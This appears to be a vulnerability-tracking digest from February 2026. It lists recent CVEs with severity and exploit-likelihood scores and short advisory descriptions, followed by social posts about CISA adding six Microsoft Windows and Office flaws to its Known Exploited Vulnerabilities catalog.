##
Updated at UTC 2026-02-10T23:30:54.068741
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-21510 | 8.8 | 0.00% | 10 | 0 | 2026-02-10T21:51:48.077000 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-21513 | 8.8 | 0.00% | 10 | 0 | 2026-02-10T21:51:48.077000 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2026-21514 | 7.8 | 0.00% | 9 | 0 | 2026-02-10T21:51:48.077000 | Reliance on untrusted inputs in a security decision in Microsoft Office Word all | |
| CVE-2026-21519 | 7.8 | 0.00% | 9 | 0 | 2026-02-10T21:51:48.077000 | Access of resource using incompatible type ('type confusion') in Desktop Window | |
| CVE-2026-21525 | 6.2 | 0.00% | 9 | 0 | 2026-02-10T21:51:48.077000 | Null pointer dereference in Windows Remote Access Connection Manager allows an u | |
| CVE-2026-21533 | 7.8 | 0.00% | 9 | 0 | 2026-02-10T21:51:48.077000 | Improper privilege management in Windows Remote Desktop allows an authorized att | |
| CVE-2026-20841 | 8.8 | 0.00% | 4 | 0 | 2026-02-10T21:51:48.077000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21347 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o | |
| CVE-2026-21346 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ | |
| CVE-2026-21345 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-1602 | 6.5 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote | |
| CVE-2026-21344 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-1507 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | The affected products are vulnerable to an uncaught exception that could allow a | |
| CVE-2026-21349 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri | |
| CVE-2026-21353 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:41 | DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21352 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:41 | DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-2139 | 8.8 | 0.09% | 1 | 0 | 2026-02-10T19:29:09.960000 | A vulnerability was determined in Tenda TX9 up to 22.03.02.10_multi. Affected by | |
| CVE-2026-1486 | 8.8 | 0.04% | 2 | 0 | 2026-02-10T18:35:16 | A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-gr | |
| CVE-2026-1603 | 8.6 | 0.00% | 2 | 0 | 2026-02-10T18:30:49 | An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo | |
| CVE-2025-52436 | 8.8 | 0.00% | 1 | 0 | 2026-02-10T18:30:40 | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri | |
| CVE-2026-24061 | 9.8 | 32.54% | 4 | 62 | template | 2026-02-10T18:30:34 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2025-70963 | 7.6 | 0.04% | 1 | 0 | 2026-02-10T18:23:11.493000 | Gophish <=0.12.1 is vulnerable to Incorrect Access Control. The administrative d | |
| CVE-2025-6967 | 8.7 | 0.00% | 4 | 0 | 2026-02-10T15:30:34 | Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol | |
| CVE-2026-2203 | 8.8 | 0.09% | 1 | 0 | 2026-02-10T15:30:26 | A flaw has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability i | |
| CVE-2026-23687 | 8.8 | 0.05% | 8 | 0 | 2026-02-10T15:22:54.740000 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated | |
| CVE-2026-23717 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-22923 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in NX (All versions < V2512). The affected a | |
| CVE-2026-2268 | 7.5 | 0.04% | 2 | 1 | 2026-02-10T15:22:54.740000 | The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo | |
| CVE-2026-2096 | 9.8 | 0.13% | 7 | 0 | 2026-02-10T15:22:54.740000 | Agentflow developed by Flowring has a Missing Authentication vulnerability, allo | |
| CVE-2026-2093 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T15:22:54.740000 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut | |
| CVE-2026-24322 | 7.7 | 0.03% | 4 | 0 | 2026-02-10T15:22:54.740000 | SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf | |
| CVE-2026-25893 | 0 | 0.20% | 1 | 0 | 2026-02-10T15:22:54.740000 | FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior | |
| CVE-2025-15310 | 7.8 | 0.02% | 1 | 0 | 2026-02-10T15:22:54.740000 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25807 | 8.8 | 0.11% | 1 | 1 | 2026-02-10T15:22:54.740000 | ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure | |
| CVE-2026-25961 | 7.5 | 0.01% | 1 | 1 | 2026-02-10T15:22:54.740000 | SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra | |
| CVE-2026-2066 | 8.8 | 0.04% | 1 | 0 | 2026-02-10T15:11:28.863000 | A weakness has been identified in UTT 进取 520W 1.7.7-180627. This affects the fun | |
| CVE-2026-2202 | 8.8 | 0.09% | 1 | 0 | 2026-02-10T15:07:30.390000 | A vulnerability was detected in Tenda AC8 16.03.33.05. Affected is the function | |
| CVE-2026-24684 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T15:02:32.033000 | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0 | |
| CVE-2026-2185 | 8.8 | 0.05% | 1 | 7 | 2026-02-10T14:54:35.470000 | A flaw has been found in Tenda RX3 16.03.13.11. This issue affects the function | |
| CVE-2026-25656 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:34 | A vulnerability has been identified in SINEC NMS (All versions), User Management | |
| CVE-2026-23720 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:34 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-25655 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The | |
| CVE-2026-23719 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23718 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23716 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2025-40587 | 7.6 | 0.04% | 2 | 0 | 2026-02-10T12:30:27 | A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), | |
| CVE-2026-23715 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:27 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2095 | 9.8 | 0.17% | 3 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo | |
| CVE-2026-2094 | 8.8 | 0.08% | 4 | 0 | 2026-02-10T09:30:31 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe | |
| CVE-2026-2097 | 8.8 | 0.21% | 6 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo | |
| CVE-2025-11242 | 9.8 | 0.04% | 2 | 0 | 2026-02-10T09:30:27 | Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S | |
| CVE-2026-23689 | 7.7 | 0.07% | 2 | 0 | 2026-02-10T06:30:44 | Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a | |
| CVE-2025-11547 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T06:30:40 | AXIS Camera Station Pro contained a flaw to perform a privilege escalation attac | |
| CVE-2026-0509 | 9.6 | 0.04% | 7 | 0 | 2026-02-10T06:30:39 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, | |
| CVE-2026-0490 | 7.5 | 0.08% | 2 | 0 | 2026-02-10T06:30:39 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp | |
| CVE-2026-0488 | 10.0 | 0.04% | 3 | 0 | 2026-02-10T06:30:38 | An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex | |
| CVE-2026-0485 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T06:30:38 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci | |
| CVE-2026-25958 | 7.7 | 0.01% | 1 | 0 | 2026-02-10T02:57:34 | ### **Impact** It is possible to make a specially crafted request with a valid | |
| CVE-2026-25939 | None | 0.03% | 1 | 1 | 2026-02-10T02:56:59 | ### Summary An authorization bypass vulnerability in the FUXA allows an unauthen | |
| CVE-2026-25894 | None | 0.23% | 1 | 0 | 2026-02-10T02:56:49 | ### Description An insecure default configuration in FUXA allows an unauthentica | |
| CVE-2026-25890 | 8.1 | 0.03% | 1 | 0 | 2026-02-10T02:56:39 | ### Summary An authenticated user can bypass the application's "Disallow" file p | |
| CVE-2026-25881 | 9.1 | 0.05% | 1 | 0 | 2026-02-10T02:56:34 | ### Summary A sandbox escape vulnerability allows sandboxed code to mutate host | |
| CVE-2026-25892 | 7.5 | 0.06% | 1 | 0 | 2026-02-10T02:56:05 | ### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sen | |
| CVE-2026-1529 | 8.1 | 0.02% | 1 | 1 | 2026-02-10T02:15:52.253000 | A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi | |
| CVE-2025-15319 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T00:30:37 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25791 | 7.5 | 0.04% | 1 | 0 | 2026-02-09T22:39:51 | ## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages | |
| CVE-2026-25639 | 7.5 | 0.01% | 1 | 0 | 2026-02-09T22:39:36 | # Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeCon | |
| CVE-2026-25761 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T21:55:30.093000 | Super-linter is a combination of multiple linters to run as a GitHub Action or s | |
| CVE-2025-69214 | 8.8 | 0.01% | 1 | 0 | 2026-02-09T21:53:03.017000 | OpenSTAManager is an open source management software for technical assistance an | |
| CVE-2026-25803 | 9.8 | 0.04% | 2 | 0 | 2026-02-09T16:08:55.263000 | 3DP-MANAGER is an inbound generator for 3x-ui. In version 2.0.1 and prior, the a | |
| CVE-2026-2070 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T16:08:55.263000 | A vulnerability has been found in UTT 进取 520W 1.7.7-180627. The affected element | |
| CVE-2026-2068 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T16:08:55.263000 | A vulnerability was detected in UTT 进取 520W 1.7.7-180627. This issue affects the | |
| CVE-2025-10465 | 8.8 | 0.02% | 1 | 0 | 2026-02-09T16:08:35.290000 | Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Informa | |
| CVE-2025-7799 | 8.6 | 0.04% | 1 | 0 | 2026-02-09T16:08:35.290000 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site | |
| CVE-2026-2236 | 7.5 | 0.05% | 3 | 0 | 2026-02-09T16:08:35.290000 | C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthen | |
| CVE-2026-22903 | 9.8 | 0.43% | 1 | 0 | 2026-02-09T16:08:35.290000 | An unauthenticated remote attacker can send a crafted HTTP request containing an | |
| CVE-2026-0870 | 7.8 | 0.01% | 1 | 0 | 2026-02-09T16:08:35.290000 | MacroHub developed by GIGABYTE has a Local Privilege Escalation vulnerability. D | |
| CVE-2025-15100 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T16:08:35.290000 | The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalat | |
| CVE-2026-2086 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T16:08:35.290000 | A vulnerability was detected in UTT HiPER 810G up to 1.7.7-171114. Affected by t | |
| CVE-2025-59023 | 8.2 | 0.01% | 1 | 0 | 2026-02-09T15:30:37 | Crafted delegations or IP fragments can poison cached delegations in Recursor. | |
| CVE-2026-25724 | 7.5 | 0.04% | 1 | 0 | 2026-02-09T14:47:41.783000 | Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code faile | |
| CVE-2025-6830 | 9.8 | 0.01% | 1 | 0 | 2026-02-09T12:30:30 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-25848 | 9.1 | 0.00% | 1 | 0 | 2026-02-09T12:30:30 | In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrat | |
| CVE-2026-25847 | 8.2 | 0.00% | 1 | 0 | 2026-02-09T12:30:30 | In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was | |
| CVE-2026-1709 | 9.4 | 0.06% | 1 | 0 | 2026-02-09T10:15:57.377000 | A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does n | |
| CVE-2026-2234 | 9.1 | 0.05% | 3 | 0 | 2026-02-09T09:30:28 | C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing | |
| CVE-2026-22904 | 9.8 | 0.12% | 1 | 0 | 2026-02-09T09:30:28 | Improper length handling when parsing multiple cookie fields (including TRACKID) | |
| CVE-2026-1868 | 10.0 | 0.03% | 1 | 0 | 2026-02-09T09:30:28 | GitLab has remediated a vulnerability in the Duo Workflow Service component of G | |
| CVE-2026-22905 | 7.5 | 0.10% | 2 | 0 | 2026-02-09T09:30:27 | An unauthenticated remote attacker can bypass authentication by exploiting insuf | |
| CVE-2026-22906 | 9.8 | 0.07% | 1 | 0 | 2026-02-09T09:30:27 | User credentials are stored using AES‑ECB encryption with a hardcoded key. An un | |
| CVE-2026-1615 | 9.8 | 0.22% | 1 | 0 | 2026-02-09T06:30:37 | All versions of the package jsonpath are vulnerable to Arbitrary Code Injection | |
| CVE-2026-2186 | 8.8 | 0.05% | 1 | 0 | 2026-02-08T21:30:29 | A vulnerability has been found in Tenda RX3 16.03.13.11. Impacted is the functio | |
| CVE-2026-2187 | 8.8 | 0.05% | 1 | 1 | 2026-02-08T21:30:29 | A vulnerability was found in Tenda RX3 16.03.13.11. The affected element is the | |
| CVE-2026-2181 | 8.8 | 0.05% | 1 | 0 | 2026-02-08T21:30:29 | A security flaw has been discovered in Tenda RX3 16.03.13.11. Affected by this v | |
| CVE-2026-2180 | 8.8 | 0.05% | 1 | 0 | 2026-02-08T21:30:19 | A vulnerability was identified in Tenda RX3 16.03.13.11. Affected is an unknown | |
| CVE-2026-2140 | 8.8 | 0.09% | 1 | 0 | 2026-02-08T09:30:22 | A vulnerability was identified in Tenda TX9 up to 22.03.02.10_multi. Affected by | |
| CVE-2026-2137 | 8.8 | 0.09% | 1 | 0 | 2026-02-08T06:31:54 | A vulnerability has been found in Tenda TX3 up to 16.03.13.11_multi. This impact | |
| CVE-2026-2138 | 8.8 | 0.09% | 1 | 0 | 2026-02-08T06:31:53 | A vulnerability was found in Tenda TX9 up to 22.03.02.10_multi. Affected is the | |
| CVE-2025-15027 | 9.8 | 0.07% | 1 | 0 | 2026-02-08T03:30:35 | The JAY Login & Register plugin for WordPress is vulnerable to Privilege Escalat | |
| CVE-2026-2071 | 8.8 | 0.04% | 1 | 0 | 2026-02-07T03:30:18 | A vulnerability was found in UTT 进取 520W 1.7.7-180627. The impacted element is t | |
| CVE-2026-25762 | 7.5 | 0.01% | 1 | 0 | 2026-02-07T00:33:35 | ### Summary A Denial of Service (DoS) vulnerability (CWE-400) exists in the mul | |
| CVE-2026-25732 | 7.5 | 0.12% | 1 | 1 | 2026-02-07T00:31:59 | ### Summary NiceGUI's `FileUpload.name` property exposes client-supplied filenam | |
| CVE-2026-25544 | 9.8 | 0.05% | 2 | 0 | 2026-02-07T00:31:53 | ### Impact When querying JSON or richText fields, user input was directly embed | |
| CVE-2026-1731 | None | 0.44% | 4 | 1 | template | 2026-02-07T00:30:34 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2025-69212 | None | 0.09% | 1 | 0 | 2026-02-06T22:11:48 | ## Summary A critical OS Command Injection vulnerability exists in the P7M (sign | |
| CVE-2026-25593 | 8.4 | 0.10% | 1 | 0 | 2026-02-06T21:57:22.450000 | OpenClaw is a personal AI assistant. Prior to 2026.1.20, an unauthenticated loca | |
| CVE-2026-25632 | 10.0 | 0.11% | 2 | 0 | 2026-02-06T21:57:22.450000 | EPyT-Flow is a Python package designed for the easy generation of hydraulic and | |
| CVE-2026-25628 | 8.6 | 0.04% | 2 | 0 | 2026-02-06T21:44:00 | ### Summary It is possible to append to arbitrary files via /logger endpoint. Mi | |
| CVE-2026-25592 | 10.0 | 0.10% | 1 | 0 | 2026-02-06T21:43:54 | ### Impact _What kind of vulnerability is it? Who is impacted?_ An Arbitrary Fi | |
| CVE-2026-25641 | 10.0 | 0.04% | 2 | 0 | 2026-02-06T21:42:58 | ### Summary A sandbox escape vulnerabilities due to a mismatch between the key o | |
| CVE-2026-25587 | 10.0 | 0.05% | 1 | 0 | 2026-02-06T21:42:55 | ### Summary As `Map` is in `SAFE_PROTOYPES`, it's prototype can be obtained via | |
| CVE-2026-25586 | 10.0 | 0.05% | 1 | 0 | 2026-02-06T21:42:50 | ## Summary A sandbox escape is possible by shadowing `hasOwnProperty` on a sandb | |
| CVE-2026-25752 | None | 0.05% | 2 | 0 | 2026-02-06T21:42:47 | ### Summary **Description** An authorization bypass vulnerability in FUXA allows | |
| CVE-2026-25751 | None | 0.05% | 2 | 0 | 2026-02-06T21:42:43 | ### Description An information disclosure vulnerability in FUXA allows an unauth | |
| CVE-2026-25580 | 8.6 | 0.01% | 1 | 0 | 2026-02-06T21:42:28 | ## Summary A Server-Side Request Forgery (SSRF) vulnerability exists in Pydanti | |
| CVE-2026-25520 | 10.0 | 0.08% | 2 | 0 | 2026-02-06T21:42:24 | ### Summary The return values of functions aren't wrapped. `Object.values`/`Obj | |
| CVE-2026-23989 | 8.2 | 0.03% | 1 | 0 | 2026-02-06T21:42:17 | ### Impact A security issue was discovered in Reva based products that enables | |
| CVE-2026-2067 | 8.8 | 0.04% | 2 | 0 | 2026-02-06T21:30:58 | A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. This vul | |
| CVE-2026-25725 | None | 0.04% | 1 | 0 | 2026-02-06T19:14:34 | Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .cl | |
| CVE-2026-25722 | None | 0.09% | 1 | 0 | 2026-02-06T19:02:42 | Claude Code failed to properly validate directory changes when combined with wri | |
| CVE-2026-2103 | 7.1 | 0.01% | 2 | 0 | 2026-02-06T18:30:43 | Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored c | |
| CVE-2026-24423 | 9.8 | 9.22% | 4 | 1 | 2026-02-06T16:45:15.323000 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2026-21643 | 9.8 | 0.13% | 6 | 1 | 2026-02-06T09:30:35 | An improper neutralization of special elements used in an sql command ('sql inje | |
| CVE-2025-11953 | 9.8 | 6.95% | 1 | 4 | 2026-02-05T21:38:32 | The Metro Development Server, which is opened by the React Native CLI, binds to | |
| CVE-2026-25049 | None | 0.03% | 1 | 1 | 2026-02-04T21:09:38 | ### Impact Additional exploits in the expression evaluation of n8n have been id | |
| CVE-2025-40551 | 9.8 | 54.99% | 1 | 0 | template | 2026-02-04T02:00:02.030000 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri |
| CVE-2025-11598 | None | 0.02% | 1 | 0 | 2026-02-03T12:30:35 | In mObywatel iOS application an unauthorized user can use the App Switcher to vi | |
| CVE-2026-0227 | 7.5 | 0.06% | 2 | 2 | 2026-01-31T00:31:36 | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated | |
| CVE-2026-1281 | 9.8 | 16.41% | 4 | 1 | 2026-01-30T13:28:18.610000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2026-1340 | 9.8 | 0.18% | 3 | 1 | 2026-01-30T00:31:28 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2015-10145 | 8.8 | 0.10% | 2 | 0 | 2026-01-29T18:32:39 | Gargoyle router management utility versions 1.5.x contain an authenticated OS co | |
| CVE-2025-15467 | 9.8 | 0.66% | 3 | 4 | 2026-01-29T15:31:31 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-21441 | 7.5 | 0.02% | 1 | 0 | 2026-01-23T16:05:22 | ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/ad | |
| CVE-2026-20817 | 7.8 | 0.06% | 1 | 0 | 2026-01-14T20:31:32.760000 | Improper handling of insufficient permissions or privileges in Windows Error Rep | |
| CVE-2024-2511 | 5.9 | 3.67% | 1 | 0 | 2025-11-04T00:31:52 | Issue summary: Some non-default TLS server configurations can cause unbounded me | |
| CVE-2025-53770 | 9.8 | 89.20% | 4 | 46 | template | 2025-10-27T17:12:40.607000 | Deserialization of untrusted data in on-premises Microsoft SharePoint Server all |
| CVE-2017-12615 | 8.1 | 94.22% | 1 | 18 | template | 2025-10-22T17:31:15 | When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e. |
| CVE-2017-12617 | 8.1 | 94.36% | 1 | 13 | template | 2025-10-22T17:30:39 | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC |
| CVE-2025-22225 | 8.3 | 5.41% | 1 | 0 | 2025-10-22T00:33:13 | VMware ESXi contains an arbitrary write vulnerability. A malicious actor with pr | |
| CVE-2025-26399 | 9.8 | 12.86% | 6 | 1 | 2025-09-23T06:30:33 | SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP | |
| CVE-2025-27158 | 7.8 | 0.04% | 1 | 0 | 2025-03-12T15:33:04 | Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are | |
| CVE-2026-25506 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-26009 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-1357 | 0 | 0.00% | 1 | 1 | N/A | ||
| CVE-2026-24682 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-25646 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24476 | 0 | 0.03% | 2 | 0 | N/A | ||
| CVE-2026-23876 | 0 | 0.06% | 1 | 0 | N/A | ||
| CVE-2026-25931 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25808 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-25880 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25925 | 0 | 0.05% | 1 | 0 | N/A | ||
| CVE-2026-25231 | 0 | 0.06% | 2 | 0 | N/A | ||
| CVE-2026-25057 | 0 | 0.04% | 1 | 0 | N/A | ||
| CVE-2026-25740 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25644 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-25636 | 0 | 0.01% | 3 | 0 | N/A | ||
| CVE-2026-25635 | 0 | 0.05% | 3 | 0 | N/A | ||
| CVE-2026-25634 | 0 | 0.01% | 3 | 0 | N/A | ||
| CVE-2026-25731 | 0 | 0.01% | 2 | 1 | N/A | ||
| CVE-2026-25643 | 0 | 0.47% | 2 | 1 | N/A |
updated 2026-02-10T21:51:48.077000
10 posts
🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
